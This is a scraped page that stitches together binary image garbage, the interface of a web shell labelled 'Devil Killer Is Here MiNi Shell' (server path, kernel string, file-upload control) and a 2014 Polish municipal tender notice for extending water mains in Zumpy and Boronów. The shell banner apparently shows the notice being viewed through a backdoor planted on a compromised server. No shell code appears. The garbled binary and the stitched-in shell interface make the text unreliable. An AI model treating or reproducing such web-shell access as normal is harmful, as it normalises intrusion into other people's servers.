JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140226/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140226/66256-N-2014.html

<p class="kh_header"><b>Boronów: Rozbudowa sieci wodociągowej w miejscowościach Zumpy i Boronów</b><br>
<b>Numer ogłoszenia: 66256 - 2014; data zamieszczenia: 26.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Boronów , ul. Dolna 2, 42-283 Boronów, woj. śląskie, tel. 034 3539100, faks 034 3669814.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.boronow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa sieci wodociągowej w miejscowościach Zumpy i Boronów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> ZADANIE I - Rozbudowa sieci wodociągowej ul. Słonecznej i ul. Tartacznej w Zumpach
Lokalizację projektowanej sieci pokazano na planie zagospodarowania terenu -rys. nr 2. Trasę zaprojektowano tak aby wodociąg włączyć w dwóch punktach do istniejących sieci. W punkcie WŁ1 projektowany wodociąg włączyć do istniejącej sieci O110, biegnącej wzdłuż ul. Słonecznej, natomiast w punkcie WŁ2 włączyć do istniejącego wodociągu biegnącego wzdłuż ulicy Tartacznej. Na odcinku Wł1-S1 wodociąg należy ułożyć prostopadle do istniejącej sieci O110mm, biegnącej wzdłuż ul. Słonecznej. W punkcie S1 zaprojektowano zmianę trasy o 900. Na odcinku S1-S3 wodociąg ma przebiegać wzdłuż ulicy Słonecznej. W punkcie S3 występuje zakręt 900. Na odcinku S3-S4 trasa przebiega wzdłuż ulicy Tartacznej. W punkcie S4 zaprojektowano zmianę trasy o kąt 900. Od punktu S4 wodociąg ułożyć prostopadle do istniejącej sieci biegnącej wzdłuż ulicy Tartacznej i włączyć do niej w punkcie WŁ2. Od punktu S2 do S6 wodociąg układać wzdłuż ulicy Tartacznej, wykonując zmianę trasy o 100 w punkcie S5.
	Projektuje się wykonanie sieci wodociągowej rur O110/6,6mm PE100 PN 10 SDR 17. Wodociąg łączyć z wykorzystaniem metody zgrzewania doczołowego.  Do łączenia wodociągu należy stosować kształtki z PE-HD o średnicy 110mm do zgrzewania doczołowego, klasy PE 100, SDR 17, PN10.   Projektowane hydranty nadziemne w kolorze czerwonym o średnicy O80 z samoczynnym odwodnieniem, podwójnym zamknięciem, na ciśnienie PN10.Armatura wodociągowa z żeliwa sferoidalnego na ciśnienie min. PN10. Warunki transportu, montażu i składowania materiałów do rozbudowy sieci wodociągowej wykonać zgodnie z wytycznymi Producentów.
	Projektowany wodociąg krzyżuje się w trzech miejscach z istniejącą siecią kanalizacji sanitarnej O200mm oraz w jednym miejscu z jej przyłączem O160mm. Skrzyżowanie wodociągu z w/w rurociągami nie wymaga dodatkowych zabezpieczeń. Należy zachować odległość minimum 20c  w świetle między krzyżującymi się przewodami. Przejście wodociągu pod jezdnią w ul. Słonecznej należy wykonać  w rurze ochronnej O200mm PE, o długości 5,7m. Po obu końcach rury na długości ok. 15cm wolną przestrzeń między rurą ochronną                                  a wodociągową należy wypełnić pianką poliuretanową. Takie samo zabezpieczenie wykonać w przejściu projektowanego wodociągu pod rurą kanalizacji deszczowej O500mm. 

ZADANIE II - Przedłużenie wodociągu ul. Korfantego w Boronowie
Projektuje się wykonanie sieci wodociągowej z rur fi 90/5,4mm PE100 PN10 SDR17 łączonych metodą zgrzewania doczołowego. Długość projektowanego wodociągu wynosi 220 m. Włączenie projektowane sieci wodociągowej fi 90mm z PE do istniejącej sieci wodociągowej fi 80mm z PCV wykonać za pomocą typowego złącza rurowo-kołnierzowego uniwersalnego DN80 (rysunek I_03 pkt W1). Przed wpinką do istniejącej sieci wodociągowej należy zdemontować istniejący hydrant nadziemny DN 80 wraz z uzbrojeniem oraz zdemontować na końcówce istniejącej sieci fi 80mm z PCV istniejące dwie wpinki przyłączy domowych wodociągowych. Istniejący rurociąg fi 80mm z PCV skrócić o długość odcinka poza zdemontowane wpinki przyłączy wodociągowych. Za zabudowanym złączem rurowo-kołnierzowym uniwersalnym DN 80 zabudować trójnik kołnierzowy żeliwny DN 80/80/80
 i poprzez tuleję kołnierzową fi 90mm PE wraz z dociskiem stalowym podłączyć projektowany
rurociąg sieci wodociągowej fi 90mm PE. Na odejściu z zabudowanego trójnika kołnierzowego żeliwnego DN 80 80 80 zabudować zasuwę odcinającą krótką kołnierzową żeliwną DN 80, króciec kołnierzowy żeliwny DN 80  30cm, kolano kołnierzowe ze stopką żeliwne DN 80  90stopni, a następnie hydrant nadziemny DN 80 (rysunek I_03 pkt 1). Głębokość i spadki ułożenia projektowanej sieci wodociągowej pokazano na rysunku profilu podłużnego. Przekroczenie projektowanej sieci wodociągowej z istniejącymi kablami energetycznymi i telekomunikacyjnym wykonać poprzez zabudowanie na istniejących kablach dwudzielnych rur ochronnych typu Arot DN 50. Na wysokości działki nr 5410 1575
zabudować typowy trójnik równoprzelotowy fi 90 90 90mm z PE do zgrzewania doczołowego w celu zabudowy hydrantu nadziemnego (rysunek I_03 pkt 4). Na odejściu 
z trójnika fi 90mm PE zabudować tuleję kołnierzową fi 90mm PE wraz z dociskiem stalowym a następnie zabudować hydrant nadziemny DN80 (zgodnie z rysunkiem I_03 pkt 5). Na rozejściu się projektowanej sieci wodociągowej (rysunek I_03 pkt 6, 7) zastosować typowe kształtki do zgrzewania doczołowego fi 90 z PE tj. trójnik równoprzelotowy fi 90/90/90mm 
z PE do zgrzewania doczołowego, łuk fi 90mm z PE  90 stopni do zgrzewania doczołowego. Na końcówkach projektowanej sieci wodociągowej zaprojektowano hydranty nadziemne żeliwne DN80 wraz z uzbrojeniem zgodnie z rysunkiem I_03 pkt 8,9,10,11. Projektowane hydranty nadziemne służyć będą do odpowietrzenia i płukania sieci wodociągowej. 
W przypadku przebudowy rurociągu zasilającego fi 80mm z PCV na rurociąg o większej średnicy, będą spełniać również rolę zabezpieczenia przeciwpożarowego. Po wykonaniu sieci wodociągowej fi 90mm PE należy wykonać przepinkę istniejących przyłączy domowych do nowo wykonanej sieci wodociągowej za pomocą opaski do nawiercania z odejściem gwintowanym DN 90/ 1 ? cala i zabudowaniu zasuwy odcinającej z gwintem DN 1 ? cala
Zabudowane hydranty i zasuwy oznakować tabliczkami orientacyjnymi na trwałych
elementach (np. ogrodzeniu) lub na stalowych słupkach metalowych.
Dla prawidłowego zabezpieczenia sieci wodociągowej przed uderzeniami hydraulicznymi zaprojektowano bloki oporowe zgodnie z rysunkiem nr I_06 w następujących punktach:
- na końcówkach projektowanej sieci wodociągowej DN 90 PE (za hydrantami)
- na zmianie kierunku (pkt 7,8,10)
Aby zabezpieczyć rurę lub kolano stopowe przed uszkodzeniem przez beton, należy oddzielić rurę dwoma warstwami grubej folii polietylenowej, a wolną przestrzeń wypełnić pianką poliuretanową.
Projektowaną sieć wodociągowa należy wykonać przy użyciu następujących materiałów:
1/ rury z PE-HD o średnicy fi 90 5,4mm PN10 klasy PE100, SDR 17
2/ kształtki z PE-HD o średnicy fi 90mm do zgrzewania doczołowego, klasy PE100,  SDR 17, PN10
3/ hydranty nadziemne w kolorze czerwonym o średnicy DN80 z samoczynnym odwodnieniem, podwójnym zamknięciem na ciśnienie PN10
4/ armatura wodociągowa z żeliwa sferoidalnego o średnicy DN 80mm na ciśnienie 
min. PN10. Warunki transportu, montażu i składowania materiałów do rozbudowy sieci wodociągowej wykonać zgodnie z wytycznymi producentów
Szczegółowy zakres zamówienia  określają  przedmiary robót - załączniki nr 3a i 3b do SIWZ, specyfikacje techniczne wykonania i odbioru robót - Zał. Nr 11 oraz dokumentacja projektowa - załącznik nr 12 do SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.00-8, 45.00.00.00-7, 45.11.12.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający  wymaga wniesienia wadium w wysokości: ZADANIE I -  3.000,00 zł
							          ZADANIE II - 1500,00 zł 
    Wadium może być wniesione w jednej lub w kilku następujących formach:
pieniądzu,
poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
	gwarancjach  bankowych,
	gwarancjach ubezpieczeniowych,
	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu  Polskiej Agencji  Rozwoju Przedsiębiorczości  ( Dz. U. Nr 109, poz. 1158  z późń.zm. ) .

Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy w Banku  Spółdzielczym w Koszęcin nie o Herby z/s w Boronowie na konto: 
nr 27 8288 1014 2001 0000 0450 0005,  przy czym za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku Zamawiającego.
Wadium wnoszone w innej formie niż pieniądz należy złożyć  w formie oryginału w siedzibie zamawiającego, pok. Nr 11 - sekretariat,  do dnia  13.03.2014 r.   do godz. 10:00., a kserokopię dołączyć do koperty.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące:
1. Posiadania wiedzy i doświadczenia tj. wykażą, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres działalności jest krótszy - w tym okresie wykonali roboty budowlane w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia tj.
- co najmniej 2 roboty budowlane z zakresu budowy wodociągu o  
o  długości minimum 200 mb. każda oraz załączą dokumenty potwierdzające że roboty zostały wykonane zgodnie  z zasadami sztuki budowlanej i prawidłowo ukończone. (warunek dla ZADANIA I i ZADANIA II)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą się ubiegać wykonawcy, którzy wykażą, że dysponują osobami, które będą uczestniczyć w wykonywaniu zamówienia w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi wraz z  informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także wykonywanych przez nie czynności oraz informacje o podstawie do dysponowania tymi osobami tj.
- kierownik budowy posiadający uprawnienia do kierowania robotami budowlanymi
 w specjalności  instalacyjnej w zakresie sieci  wodociągowych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą się ubiegać wykonawcy, którzy wykażą, że  są ubezpieczeni od odpowiedzialności cywilnej  w zakresie działalności związanej z przedmiotem zamówienia na kwotę, co najmniej 100.000,00 złotych (słownie : sto tysięcy)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>roboty budowlane z zakresu budowy wodociągu o długości minimum 200 mb.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. kosztorys ofertowy w formie uproszczonej wraz z tabelą elementów scalonych sporządzony na podstawie przedmiarów robót stanowiących załączniki nr 3a i 3b do SIWZ
2. informacja o częściach zamówienia, które wykonawca podzleci podwykonawcom - według załącznika nr 7 do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>10.Na podstawie art. 144 ustawy Pzp zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści złożonej oferty na podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej z uwzględnieniem podawanych warunków ich wprowadzenia:
10.1.Zmiany w zakresie terminu realizacji zamówienia:
   a/ zmiany spowodowane niekorzystnymi warunkami atmosferycznymi,  uniemożliwiającymi wykonanie robót, w szczególności:
       - klęski żywiołowe,
       - działania siły wyższej,
   b/ zmiany spowodowane warunkami geologicznymi, archeologicznymi lub  terenowymi,
 w szczególności:
       - niewybuchy, niewypały,
       - wykopaliska archeologiczne,
       - wystąpienie niezinwentaryzowanych obiektów, urządzeń, obiektów itp.,
   c/ zmiany będące następstwem okoliczności leżących po stronie zamawiającego, w szczególności:
       - wstrzymanie robót przez zamawiającego na jego wyraźny wniosek,
   d/ konieczność udzielenia zamówień dodatkowych w rozumieniu przepisów Pzp,
   e/ inne przyczyny zewnętrzne niezależne od zamawiającego oraz wykonawcy skutkujące niemożnością prowadzenia prac,
   f/ inne okoliczności np. związane z przedłużającą się procedurą przetargową mającą  wpływ na termin podpisania umowy i przystąpienie do realizacji robót.
10.1.1.Warunki dokonania zmian:
    - w przypadku wystąpienia którejkolwiek okoliczności wymienionej powyżej  termin  wykonania umowy może ulec odpowiedniemu przedłużeniu o czas niezbędny do zakończenia wykonania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności.
10.2.Zmiany sposobu spełniania świadczenia co może spowodować zmianę terminu realizacji zamówienia , zmianę wynagrodzenia wykonawcy:
- zmiany technologiczne, w szczególności  konieczność zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań lub materiałów ze względu na zmianę obowiązującego prawa.
10.2.1.Powyższe zmiany będą wprowadzone wyłącznie w zakresie umożliwiającym oddanie przedmiotu umowy do użytkowania , a Zamawiający może ponieść ryzyko zwiększenia wynagrodzenia z tytułu takich zmian wyłącznie w kwocie równej zwiększonym z tego powodu kosztom. 
10.3.Zmiany osobowe, w tym zmiany podwykonawców:
- zmiana osób przy pomocy których wykonawca realizuje przedmiot umowy na inne legitymujące się co najmniej równoważnymi uprawnieniami i kwalifikacjami , o których mowa w ustawie Prawo budowlane lub innych ustawach, a także SIWZ będzie wymagała także zaakceptowania przez zamawiającego. 
10.4. Pozostałe zmiany:
- zmiana stawki VAT:
  a/ jeśli zmiany stawki VAT będą powodować zwiększenie kosztów wykonania umowy    po stronie wykonawcy, zamawiający dopuszcza możliwość zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku VAT zapłaconego przez wykonawcę,
  b/jeśli zmiana stawki VAT będzie powodować zmniejszenie kosztów wykonania  umowy po stronie wykonawcy, zamawiający dopuszcza możliwość zmniejszenia wynagrodzenia o kwotę stanowiącą różnicę kwoty VAT do zapłacenia przez wykonawcę.  
10.5.Rezygnacja z części prac:
  a/ rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy. W takim    wypadku wynagrodzenie przysługujące Wykonawcy zostanie pomniejszone, przy  czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które Wykonawca poniósł w związku z wynikającymi z umowy planowanymi świadczeniami.
  b/ zamawiający dopuszcza możliwość zmian materiałów przedstawionych w ofercie   przetargowej, pod warunkiem że zmiany te będą korzystne dla Zamawiającego.  
 Będą to przykładowo okoliczności:
      - powodujące obniżenie kosztu ponoszonego przez Zamawiającego na  eksploatację i konserwację przedmiotu umowy,
      - powodujące poprawienie parametrów technicznych,
      - wynikające z aktualizacji rozwiązań z uwagi na postęp technologiczny lub zmiany  
        obowiązujących przepisów.
10.6.Wszystkie powyższe postanowienia stanowią katalog zmian, na które zamawiający może wyrazić zgodę. 
10.7.Nie stanowią zmiany umowy w rozumieniu art. 144 ustawy Pzp:
   a/ zmiana danych związanych z obsługą administracyjno-organizacyjną np. zmiana rachunku bankowego,
   b/zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów między  stronami.
10.8.Określa się następujący tryb dokonania zmian postanowień umowy.
10.8.1.Sposób inicjowania zmian:
    a/ zamawiający wnioskuje do Wykonawcy w sprawie możliwości dokonania wskazanej zmiany,
    b/wykonawca wnioskuje do Zamawiającego w sprawie możliwości dokonania  wskazanej zmiany,
    c/ przyczyny dokonania zmian postanowień umowy oraz uzasadnienie takich zmian należy opisać w stosownych dokumentach (notatka służbowa, pismo Wykonawcy, protokół konieczności itp.).
    d/ protokół konieczności wymaga potwierdzenia przez projektanta i zatwierdzenia  przez Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.boronow.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Boronów, ul. Dolna 2, 42-283 Boronów, pok. nr 12 w cenie 30 zł + VAT.</p>
